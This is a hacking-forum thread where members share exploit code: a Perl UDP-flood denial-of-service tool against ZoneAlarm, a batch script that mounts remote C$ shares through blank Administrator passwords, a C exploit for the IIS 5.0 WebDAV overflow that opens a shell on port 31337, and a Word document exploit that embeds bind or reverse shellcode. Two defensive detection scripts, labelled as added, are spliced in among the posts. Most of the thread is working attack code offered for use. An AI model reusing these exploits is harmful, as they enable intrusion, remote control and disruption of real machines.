About this Topic
Behrooz_Ice
09-02-2003, 12:43 AM
Hello friends, we opened this thread so that friends who want to post news from the world of Hacking and Network Security can do so here. I have also enabled attachments for all members in this topic, but please avoid uploading large files and try mostly to post news about Hacking and Security here; if your news is approved by us, we will definitely put that news under your name on the ashiyane.org site.
The suggestion to open and create this thread came from dear Reza Faghihie, whom we thank right here.
Good luck
Behrooz Kamalian
Hello Mr. Behrooz
Thank you very much, I really enjoyed this
So from now on I should put all my posts here, right?
I'll put the new exploit code here from now on
In my opinion it would be better if we opened another site too
and also raised the news on ashiyane.org from 3 items to 5
thx
bye
hi
nice dos for all versions of ZoneAlarm
ZoneAlarm was found vulnerable to a serious vulnerability leading to a remote Denial Of Service condition due to failure to handle random UDP packets; if an attacker sends multiple UDP packets to multiple ports 0-65000, the machine will hang up until the attacker stops flooding.
Operating Systems : ALL Windows
exploit :
#!/usr/bin/perl
use Socket;
system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print " DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n Usage : perl $0 <Target>\n\n");}
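As an added defender-side example (not code from the post above), the pattern the advisory describes, one source spraying UDP datagrams at random ports 0-65000, can be picked out of firewall logs by counting distinct destination ports per source inside a sliding window. The FWIN log format, the 10-second window and the 50-port threshold are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
import random

WINDOW_SECONDS = 10   # sliding window (assumed tuning value)
PORT_THRESHOLD = 50   # distinct UDP destination ports per source within the window


def parse_line(line):
    """Parse one FWIN record; return (timestamp, src_ip, dst_port, proto) or None.
    Assumed format: FWIN,<yyyy/mm/dd>,<hh:mm:ss> <utc offset>,<src>:<port>,<dst>:<port>,<proto>"""
    parts = line.strip().split(",")
    if len(parts) != 6 or parts[0] != "FWIN":
        return None
    _, date, clock, src, dst, proto = parts
    ts = datetime.strptime(date + " " + clock.split(" ")[0], "%Y/%m/%d %H:%M:%S")
    return ts, src.rsplit(":", 1)[0], int(dst.rsplit(":", 1)[1]), proto


def detect_udp_floods(lines):
    """Return {src_ip: timestamp of first alert} for sources that reach
    PORT_THRESHOLD distinct UDP destination ports within WINDOW_SECONDS.
    Lines must be in chronological order."""
    recent = defaultdict(deque)   # src_ip -> deque of (timestamp, dst_port)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[3] != "UDP":
            continue
        ts, src, dport, _ = rec
        q = recent[src]
        q.append((ts, dport))
        while (ts - q[0][0]).total_seconds() > WINDOW_SECONDS:   # expire old entries
            q.popleft()
        if src not in alerts and len({p for _, p in q}) >= PORT_THRESHOLD:
            alerts[src] = ts
    return alerts


def build_sample_log(seed=1):
    """Constructed log, not a real capture: one host receiving normal DNS replies
    on a fixed port, one host spraying 200 datagrams at random ports in 5 seconds."""
    rng = random.Random(seed)
    base = datetime(2003, 9, 2, 0, 43, 0)
    events = []
    for i in range(20):   # benign: DNS replies from a resolver, one per second
        events.append((base + timedelta(seconds=i),
                       "192.0.2.53:53", "192.0.2.10:1025"))
    for i in range(200):  # flood: one source socket, random destination ports
        events.append((base + timedelta(milliseconds=25 * i),
                       "198.51.100.7:1040", "192.0.2.10:%d" % rng.randint(1, 65000)))
    events.sort(key=lambda e: e[0])
    return ["FWIN,%s,%s +0:00 GMT,%s,%s,UDP"
            % (t.strftime("%Y/%m/%d"), t.strftime("%H:%M:%S"), s, d)
            for t, s, d in events]


if __name__ == "__main__":
    for src, when in detect_udp_floods(build_sample_log()).items():
        print("UDP random-port flood from %s, first seen at %s" % (src, when))
```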
FOLDERS.BAT:
CODE
@echo off
@NET USE \\%1\ipc$ "" /user:Administrator""
@NET USE Z: \\%1\c$
@MD Z:\Windows\Desktop\%2\
@NET USE Z: /DELETE
@NET USE \\%1\ipc$ /DELETE
From the command prompt: FOLDERS.BAT [IP ADDRESS] [Folder Name]
e.g. C:\>FOLDERS.BAT 127.0.0.1 Hello
If he's not got a blank password, then you're going to need to break it. I'm not going to help you break passwords. But I'm sure all the info is in the forum.
Here is the code I've modified from the xwebdav source code; now you can pass a file.
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
* Modified By JFCa, now you can pass a file with IPs
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
FILE *fs;
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
"</g:searchrequest>\r\n";
void usage(char *prog)
{
printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
"Bug overflow NTDLL.DLL\n"
"Usage: %s FILE\n", prog);
exit(-1);
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int xwebdav(char *arg)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;
printf("Resolving %s .. ", arg);
if ((he = gethostbyname(arg)) == NULL)
{
fprintf(stderr, "Unknown host\n");
exit(-1);
}
printf("Resolved\n");
port = htons(31337);
port ^= 0x9999;
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
sock1.sin_family = AF_INET;
sock1.sin_port = htons(80);
printf("[+] Attacking %s via port: 80\n", arg);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
return(-1);
}
if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
{
perror("Failed to connect");
return(-1);
}
bzero(buffer,100000);
strcpy(buffer,"SEARCH /");
i = strlen(buffer);
buffer[i] = NOP;
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " [Only registered and activated users can see links]");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
"Content-Length: %d\r\n\r\n", arg, strlen(body)
+ strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
memset(buffer+strlen(buffer), 0x01, 1);
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
return(-1);
}
printf("[+] Overflow sent, waiting for 5 seconds\n");
sleep(5);
bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
sock2.sin_family = AF_INET;
sock2.sin_port = htons(31337);
printf("[+] Connecting to %s: 31337\n", arg);
if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
return(-1);
}
if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
{
printf("[+] Unable to connect.\n"
"[+] Exploitation failed, maybe blocked by firewall.\n");
close(sock);
close(sck);
return (-1);
}
close(sock);
printf("[+] Successfull, attempting to join shell ...\n\n");
shell(sck);
return 0;
}
int main (int argc, char **argv)
{
char st[30];
if (argc != 2) usage(argv[0]);
fs=fopen(argv[1],"r");
if(!fs) {printf("Error, File %s not found\n",argv[1]);exit(1);}
while (fscanf(fs,"%s",&st) != EOF){
xwebdav(st);
}
fclose(fs);
exit(0);
}
Enjoy!!!!!!
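An added example, not part of the exploit or the original post: the request the code above builds is a WebDAV SEARCH whose request-target is tens of kilobytes of non-printable bytes, which a reverse proxy or IDS can flag without knowing anything about the payload. The 16 KiB target cap and the sample requests are assumptions/constructed.

```python
MAX_TARGET_LEN = 16384   # assumed cap; legitimate WebDAV request-targets are tiny
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "MKCOL",
                  "COPY", "MOVE", "LOCK", "UNLOCK"}


def inspect_request(raw: bytes) -> dict:
    """Inspect one raw HTTP request and return findings plus a 'suspicious' verdict."""
    end = raw.find(b"\r\n")
    request_line = raw if end < 0 else raw[:end]
    parts = request_line.split(b" ", 2)
    f = {"method": None, "target_len": 0, "webdav": False, "oversized_target": False,
         "binary_in_request_line": False, "malformed": False, "suspicious": False}
    if len(parts) < 2:                       # no "<method> <target>" pair at all
        f["malformed"] = f["suspicious"] = True
        return f
    method, target = parts[0], parts[1]
    f["method"] = method.decode("ascii", "replace")
    f["target_len"] = len(target)
    f["webdav"] = f["method"] in WEBDAV_METHODS
    f["oversized_target"] = len(target) > MAX_TARGET_LEN
    # 0x90 NOPs and return-address bytes are never part of a printable request line
    f["binary_in_request_line"] = any(b < 0x20 or b > 0x7e for b in request_line)
    f["suspicious"] = f["oversized_target"] or f["binary_in_request_line"]
    return f


def constructed_samples():
    """Constructed requests, not captured traffic. The second one only copies the
    shape of the overflow request above: a 64 KiB target of NOP filler, no shellcode."""
    body = (b"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
            b"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
            b"</g:searchrequest>\r\n")
    headers = (b" HTTP/1.1\r\nHost: intranet.example\r\n"
               b"Content-Type: text/xml\r\nContent-Length: %d\r\n\r\n" % len(body))
    benign = b"SEARCH /docs/" + headers + body
    overlong = b"SEARCH /" + b"\x90" * 65534 + headers + body
    return benign, overlong


if __name__ == "__main__":
    for req in constructed_samples():
        r = inspect_request(req)
        print("%s target=%d bytes suspicious=%s" % (r["method"], r["target_len"], r["suspicious"]))
```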
-------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
/* eip offset for Word 2000 9.0.2812 */
#define EIP_OFFSET 1359
/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343
void usage(char *name)
{
printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");
printf("Usage: %s <shell type> <template doc> <os> <port> [<ip>]\n\n", name);
printf("Shell type : 1 - Bind shell (need port)\n");
printf(" 2 - Reverse shell (need ip and port)\n\n");
printf("OS : 1 - Windows 2000 Pro SP3 French\n");
printf(" 2 - Windows NT4 Workstation SP5 French\n");
printf(" 3 - Windows NT4 Workstation SP6 French\n");
exit(1);
}
int main(int argc, char *argv[])
{
unsigned char bindshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x 89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x 08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x 68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\x ff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x 00\x00\x89\x46"
"\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x 00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x 00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x 00\x89\x46\x1c"
"\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x 00\x89\x46\x20"
"\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x 00\x89\x46\x24"
"\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x 00\x89\x46\x28"
"\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x 00\x89\x46\x2c"
"\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x 00\x00\xff\x56"
"\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x 89\xc3\x57\x57"
"\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x 51\x53\xff\x56"
"\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x 89\xc2\x68\x65"
"\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\x c4\xac\xff\xff"
"\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\x e2\xfd\xc6\x44"
"\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x 54\x24\x4c\x89"
"\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x 41\x51\x49\x51"
"\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\x ff\xff\xff\xff"
"\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x 00\x00\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x 53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\x ee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\x eb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x 4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\x ea\x5f\x5e\x5d"
"\x5b\xc2\x04\x00";
char revshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x 89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x 08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x 68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\x ff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x 00\x00\x89\x46"
"\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x 00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x 00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x 00\x89\x46\x1c"
"\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x 00\x89\x46\x20"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\x ff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x eb\x03\xff\x56"
"\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\x e1\x6a\x10\x51"
"\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x 00\x89\x66\x30"
"\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\x c9\x80\xe9\xeb"
"\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x 89\x5c\x24\x48"
"\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x 54\x50\x51\x51"
"\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x 89\xe1\x68\xff"
"\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x 56\x64\xa1\x30"
"\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x 08\x5e\xc2\x04"
"\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x 8b\x54\x05\x78"
"\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x 49\x8b\x34\x8b"
"\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\x c1\xcf\x0d\x01"
"\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x 01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x eb\x02\x31\xc0"
"\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";
FILE *docfile;
unsigned short port;
const char *eip;
char targetos[255];
int i;
int bshell;
if (argc <5) {
usage(argv[0]);
}
printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");
/* Shell type */
switch(atoi(argv[1])) {
case 1 : printf("-- Shell type : bind shell\n");
bshell = 1;
break;
case 2 : printf("-- Shell type : reverse shell\n");
bshell = 0;
break;
default : printf("-- Shell type : unknown\n");
exit(1);
}
/* Open template file */
if( (docfile = fopen(argv[2], "r+b")) == NULL) {
printf("-- Can't open file %s\n", argv[2]);
exit(1);
}
else {
printf("-- Template file : \"%s\"\n", argv[2]);
}
/* Customize shellcode */
port = htons(atoi(argv[4]));
if(bshell) {
*(unsigned short *)&bindshell[227] = port;
printf("-- Port : %d\n", atoi(argv[4]));
}
else {
*(unsigned short *)&revshell[185] = port;
printf("-- Port : %d\n", atoi(argv[4]));
*(unsigned int *)&revshell[178] = inet_addr(argv[5]);
printf("-- IP : %s\n", argv[5]);
}
/* Set the return address */
switch(atoi(argv[3])) {
// Windows 2000 Pro SP3 - French
case 1 : sprintf(targetos, "Windows 2000 Pro SP3 - French");
eip = "\xA7\x88\xE2\x77";
break;
// Windows NT4 Workstation SP5 - French
case 2 : sprintf(targetos, "Windows NT4 Workstation SP5 - French");
eip = "\x10\x45\xEB\x77";
break;
// Windows NT4 Workstation SP6 - French
case 3 : sprintf(targetos, "Windows NT4 Workstation SP6 - French");
eip = "\x36\x28\xF3\x77";
break;
// Add your own return address here
default : printf("-- Target OS : unknown\n");
exit(1);
}
printf("-- Target OS : %s\n", targetos);
fseek(docfile, EIP_OFFSET, SEEK_SET);
fwrite(eip, sizeof(eip), 1, docfile);
// Put some nop
for (i=0;i<24;i++) {
fseek(docfile, EIP_OFFSET + 4 + i, SEEK_SET);
fwrite("\x90", sizeof(char), 1, docfile);
}
// Put our shellcode
fseek(docfile, EIP_OFFSET + 28, SEEK_SET);
if(bshell) {
fwrite(bindshell, sizeof(bindshell), 1, docfile);
}
else {
fwrite(revshell, sizeof(revshell), 1, docfile);
}
fclose(docfile);
printf("-- Status : template file modified\n");
if(bshell) {
printf("-- After document execution : nc <ip> %d\n", atoi(argv[4]));
}
else {
printf("-- Before document execution : nc -l -p %d\n", atoi(argv[4]));
}
return 0;
}
nice util !!!! :D
-------------------------
hi
-----
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
